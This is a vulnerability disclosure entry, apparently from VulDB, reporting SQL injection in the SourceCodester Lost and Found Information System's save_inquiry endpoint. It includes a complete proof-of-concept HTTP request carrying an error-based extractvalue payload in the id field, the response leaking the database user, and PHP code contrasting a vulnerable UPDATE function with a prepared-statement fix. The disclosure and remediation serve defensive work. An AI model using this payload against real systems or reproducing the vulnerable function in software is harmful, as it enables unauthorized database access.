| Title | SourceCodester Lost and Found Information System SQL injection |
|---|---|
| Description | I found a SQL injection vulnerability in the SourceCodester Lost and Found Information System (https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html). This affects the file /classes/Master.php?f=save_inquiry: |

```http
POST /php-lfis/classes/Master.php?f=save_inquiry HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------291530209222137902962820473916
Content-Length: 1093
Origin: http://localhost
Connection: close
Referer: http://localhost/php-lfis/admin/?page=items/manage_item
Cookie: PHPSESSID=0mct2fkncfd5or5crbqj5o62he
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="id"

1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="category_id"

2
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="fullname"

1111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="title"

111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="contact"

111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="description"

1111
-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream

-----------------------------291530209222137902962820473916
Content-Disposition: form-data; name="status"

0
-----------------------------291530209222137902962820473916--
```

And it returns:

```json
{"status":"failed","err":"XPATH syntax error: '~admin@localhost~'[UPDATE `inquiry_list` set `category_id`='2' , `fullname`='1111' , `title`='111' , `contact`='111' , `description`='1111' , `status`='0' where id = '1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#' ]"}
```

The appearance of '~admin@localhost~' proves that our code `select user()` was successfully executed, and there is an SQL error injection vulnerability here.

The vulnerability arises from the usage of the code ``UPDATE `inquiry_list` set {data} where id = '{id}' ;`` without implementing sufficient filtering on the controllable parameter `id`. This lack of proper filtering exposes the potential for SQL injection attacks. To address this issue, my recommendation is to protect the `id` parameter against malicious exploitation by utilizing `mysqli_real_escape_string()`.
| Source | https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html |
|---|---|
| User | Tritium (UID 50779) |
| Submission | 14.07.2023 12:39 (3 years ago) |
| Moderation | 15.07.2023 09:33 (21 hours later) |
| Status | Accepted |
| VulDB Entry | 234224 [SourceCodester Lost and Found Information System 1.0 HTTP POST Request Master.php?f=save_inquiry ID SQL Injection] |
| Points | 20 |
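The UPDATE pattern quoted in the description, written out as an added example beside a hardened version (this is not the project's code): the fix binds every value through a mysqli prepared statement and casts `id` to an integer, instead of escaping the string as the report recommends. Assumed: `$conn` is an open mysqli connection and the column names are those in the reported query.

```php
<?php
// Added example, not the project's code. Assumes $conn is an open mysqli
// connection and that the column names match the reported UPDATE statement.

// Vulnerable pattern from the report: `id` is interpolated into the SQL text.
// A value such as  1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
// closes the quote and appends attacker SQL; the MySQL error text is then
// echoed back to the client, which matches the shape of the reported response.
function save_inquiry_vulnerable(mysqli $conn, array $post): array
{
    $parts = [];
    foreach (['category_id', 'fullname', 'title', 'contact', 'description', 'status'] as $k) {
        $parts[] = "`{$k}`='" . $post[$k] . "'";
    }
    $data = implode(' , ', $parts);
    $id   = $post['id'];
    $sql  = "UPDATE `inquiry_list` set {$data} where id = '{$id}' ";
    if ($conn->query($sql) === false) {
        // Leaks the DB error and the full query to the caller (error-based oracle).
        return ['status' => 'failed', 'err' => $conn->error . '[' . $sql . ']'];
    }
    return ['status' => 'success'];
}

// Hardened version: user input never becomes part of the SQL text. Every value
// is bound as a parameter, `id` is cast to int because the column is numeric,
// and database errors are logged server-side instead of being returned.
function save_inquiry_fixed(mysqli $conn, array $post): array
{
    $cols = ['category_id', 'fullname', 'title', 'contact', 'description', 'status'];
    $set  = implode(', ', array_map(fn(string $c): string => "`{$c}` = ?", $cols));
    $stmt = $conn->prepare("UPDATE `inquiry_list` SET {$set} WHERE `id` = ?");
    if ($stmt === false) {
        error_log('save_inquiry prepare failed: ' . $conn->error);
        return ['status' => 'failed'];
    }
    $vals   = array_map(fn(string $c): string => (string)($post[$c] ?? ''), $cols);
    $vals[] = (int)($post['id'] ?? 0);
    // Type string: one 's' per text column, then 'i' for the integer id.
    $stmt->bind_param(str_repeat('s', count($cols)) . 'i', ...$vals);
    if (!$stmt->execute()) {
        error_log('save_inquiry execute failed: ' . $stmt->error);
        return ['status' => 'failed'];
    }
    return ['status' => 'success', 'affected' => $stmt->affected_rows];
}
```

With the fixed function, the reported `id` value is cast to `1` and the rest of the string is discarded, so the statement updates at most one row and no query text reaches the client.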